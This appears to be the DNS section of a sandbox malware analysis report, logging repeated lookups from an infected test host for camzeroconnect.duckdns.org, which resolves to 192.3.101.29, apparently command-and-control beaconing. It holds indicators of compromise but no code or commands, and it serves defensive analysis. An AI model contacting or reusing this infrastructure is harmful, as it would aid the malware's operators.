                                                                                            Sep 27, 2024 14:03:56.356981993 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.364865065 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.373145103 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.380249977 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.387121916 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:57.413065910 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.426529884 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.520391941 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.529246092 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.536519051 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.566481113 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.575681925 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.582640886 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.589510918 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:03.590403080 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.612298012 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.712228060 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.725301027 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.737396955 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.749265909 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.765167952 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.777570009 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.788455963 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.797410965 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.805464029 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.832499981 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.841325045 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.849286079 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.857372999 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                            Sep 27, 2024 14:02:04.278798103 CEST8.8.8.8192.168.2.220x4685No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.285340071 CEST8.8.8.8192.168.2.220x4685No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.293724060 CEST8.8.8.8192.168.2.220x4685No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.312244892 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.319056034 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.326452017 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.334017992 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.342823029 CEST8.8.8.8192.168.2.220x2e0bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:06.800004005 CEST8.8.8.8192.168.2.220xc59Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.080513954 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.089909077 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.100590944 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.108881950 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.119424105 CEST8.8.8.8192.168.2.220xf17cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.155910015 CEST8.8.8.8192.168.2.220x7cb7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.162985086 CEST8.8.8.8192.168.2.220x7cb7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:10.270761013 CEST8.8.8.8192.168.2.220x7cb7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:10.289028883 CEST8.8.8.8192.168.2.220x7cb7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.417829037 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.425306082 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.433037043 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.440623999 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.154376030 CEST8.8.8.8192.168.2.220x7cb7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.467782021 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.475064993 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.481853962 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.489291906 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.495903015 CEST8.8.8.8192.168.2.220x4f59No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.519996881 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.527364969 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.536453009 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.548146009 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.561284065 CEST8.8.8.8192.168.2.220xe0f5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.555946112 CEST8.8.8.8192.168.2.220xab60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.599407911 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.610790014 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.619100094 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.631732941 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.644714117 CEST8.8.8.8192.168.2.220x60a9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.668685913 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.676539898 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.690076113 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.700191975 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.712657928 CEST8.8.8.8192.168.2.220x95bcNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.726962090 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.733617067 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.740940094 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.748574018 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.755320072 CEST8.8.8.8192.168.2.220x678bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.778495073 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.799374104 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.813419104 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.831449032 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.854410887 CEST8.8.8.8192.168.2.220x82d3No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.878428936 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.889507055 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.920315981 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.937869072 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.945465088 CEST8.8.8.8192.168.2.220x863fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:20.974731922 CEST8.8.8.8192.168.2.220xcd4fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:20.994302034 CEST8.8.8.8192.168.2.220xcd4fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.462201118 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.478538990 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.489877939 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.498716116 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.506505966 CEST8.8.8.8192.168.2.220xc8f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.529395103 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.537921906 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.547296047 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.558698893 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.567609072 CEST8.8.8.8192.168.2.220x71faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.594616890 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.603899956 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.611955881 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.619211912 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.629544020 CEST8.8.8.8192.168.2.220x11cfNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.650341988 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.659401894 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.670885086 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.678873062 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.686944008 CEST8.8.8.8192.168.2.220x4714No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.718914032 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.732901096 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.740436077 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.748317003 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.758771896 CEST8.8.8.8192.168.2.220x34cbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.796268940 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.843225956 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.880785942 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.897290945 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.886224031 CEST8.8.8.8192.168.2.220xc195No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.984044075 CEST8.8.8.8192.168.2.220xf3faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.993442059 CEST8.8.8.8192.168.2.220xf3faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:32.001693010 CEST8.8.8.8192.168.2.220xf3faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:35.975151062 CEST8.8.8.8192.168.2.220xf3faServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:36.995634079 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.002871037 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.008770943 CEST8.8.8.8192.168.2.220xf3faServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.010605097 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.017405987 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.024231911 CEST8.8.8.8192.168.2.220xf153No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.036595106 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.044112921 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.052233934 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.059756041 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.067914009 CEST8.8.8.8192.168.2.220xe446No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.081543922 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.088182926 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.095236063 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.101744890 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.108789921 CEST8.8.8.8192.168.2.220xc307No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:40.131923914 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:40.139178038 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:41.243313074 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:41.256032944 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:41.263977051 CEST8.8.8.8192.168.2.220x2d8cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.288079977 CEST8.8.8.8192.168.2.220x1bfaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.295272112 CEST8.8.8.8192.168.2.220x1bfaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.301724911 CEST8.8.8.8192.168.2.220x1bfaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.759710073 CEST8.8.8.8192.168.2.220x5399No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.772829056 CEST8.8.8.8192.168.2.220x1137No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.780010939 CEST8.8.8.8192.168.2.220x1137No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.023657084 CEST8.8.8.8192.168.2.220x1137No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.031347990 CEST8.8.8.8192.168.2.220x1137No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.510981083 CEST8.8.8.8192.168.2.220xf2ffServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:50.037794113 CEST8.8.8.8192.168.2.220x1137Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:53.160645962 CEST8.8.8.8192.168.2.220x4da7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:55.311009884 CEST8.8.8.8192.168.2.220x4da7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:55.340141058 CEST8.8.8.8192.168.2.220x4da7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.364638090 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.373001099 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.380108118 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.386998892 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.394016981 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.167323112 CEST8.8.8.8192.168.2.220x4da7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.518785954 CEST8.8.8.8192.168.2.220x1f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.528866053 CEST8.8.8.8192.168.2.220x1f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.536273003 CEST8.8.8.8192.168.2.220x1f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.542874098 CEST8.8.8.8192.168.2.220x1f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.575504065 CEST8.8.8.8192.168.2.220xde5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
